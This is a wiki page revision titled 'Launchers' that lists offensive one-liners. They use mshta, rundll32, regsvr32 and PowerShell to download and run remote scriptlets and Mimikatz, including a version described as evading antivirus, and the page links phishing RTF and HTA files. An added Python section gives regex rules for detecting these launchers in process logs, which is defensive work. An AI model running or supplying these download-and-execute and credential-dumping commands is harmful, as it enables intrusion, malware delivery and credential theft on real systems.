Launchers: Difference between revisions
Revision as of 14:18, 18 April 2017
Some fun one-liners to start a script
mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject('WScript.Shell');w.Exec('calc')");
https://twitter.com/ch33kyf3ll0w/status/816319597645328384
https://gist.github.com/subTee/62fc28bb5dc58dbe9efdd56d65921bd2
#runs mimikatz straight from github
invoke-expression (Invoke-WebRequest -Uri https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1).content;invoke-mimikatz
#runs mimikatz with split-up custom version to evade antivirus
invoke-expression (Invoke-WebRequest -Uri https://mendelonline.be/security/poc/test.code.txt).content;invoke-bananas
#starts calc
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test.sct scrobj.dll
#starts powershell that runs mimikatz
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test2.sct scrobj.dll
https://github.com/subTee/DerbyCon2016/blob/master/scrat.ps1
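For defenders, each launcher above leaves a recognizable process command line in process-creation logs (Sysmon Event ID 1, or Windows event 4688 with command-line auditing). The following is an added example, not part of the original wiki page; the rule names, the sample events and the example.test host are constructed for illustration.

```python
import re

# Rules keyed to the launch patterns on this page; matched case-insensitively
# against the full command line of a process-creation event.
RULES = [
    # mshta handed a vbscript:/javascript: URL that loads a remote scriptlet
    ("mshta_remote_scriptlet", re.compile(
        r"\bmshta(\.exe)?\b.*\b(vbscript|javascript):.*script:\s*https?://", re.I)),
    # rundll32 given a javascript: pseudo-URL that routes into mshtml
    ("rundll32_javascript_mshtml", re.compile(
        r"\brundll32(\.exe)?\b.*javascript:.*mshtml(\.dll)?\s*,\s*RunHTMLApplication", re.I)),
    # regsvr32 fetching a scriptlet over HTTP(S) through scrobj.dll, any flag order
    ("regsvr32_remote_scriptlet", re.compile(
        r"\bregsvr32(\.exe)?\b(?=.*[/-]i:\s*https?://)(?=.*\bscrobj\.dll\b)", re.I)),
    # PowerShell evaluating the body of a web download, either order
    ("powershell_download_eval", re.compile(
        r"(?=.*\b(invoke-expression|iex)\b)"
        r"(?=.*\b(invoke-webrequest|iwr|downloadstring)\b)(?=.*https?://)", re.I)),
]

def classify(command_line):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(command_line)]

# Constructed sample events (example.test is a placeholder host).
SAMPLE_EVENTS = [
    'mshta.exe vbscript:GetObject("script:https://example.test/sct")(window.close)',
    r'rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("...")',
    "regsvr32 /u /n /s /i:https://example.test/a.sct scrobj.dll",
    "powershell -c invoke-expression (Invoke-WebRequest -Uri https://example.test/a.ps1).content",
    r"regsvr32 /s C:\Windows\System32\scrobj.dll",  # benign: local registration
    "powershell -c Invoke-WebRequest -Uri https://example.test/f.zip -OutFile f.zip",  # benign
    r"mshta.exe C:\Tools\help.hta",  # benign: local HTA
]

def scan(events):
    """Map each flagged command line to the rules it triggered."""
    return {e: hits for e in events if (hits := classify(e))}

if __name__ == "__main__":
    for event, hits in scan(SAMPLE_EVENTS).items():
        print(", ".join(hits), "<-", event)
```

Command-line rules like these are a triage aid: pair them with parent-process and outbound-connection telemetry for the same binaries, since the strings themselves can be rearranged.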
phishing docs
- Credits.rtf - https://mendelonline.be/security/poc/Credits.rtf - run mshta from rtf
- "Show information.hta" - https://mendelonline.be/security/poc/Show%20information.hta - run code from hta file
more
- subTee's gists: https://gist.github.com/subTee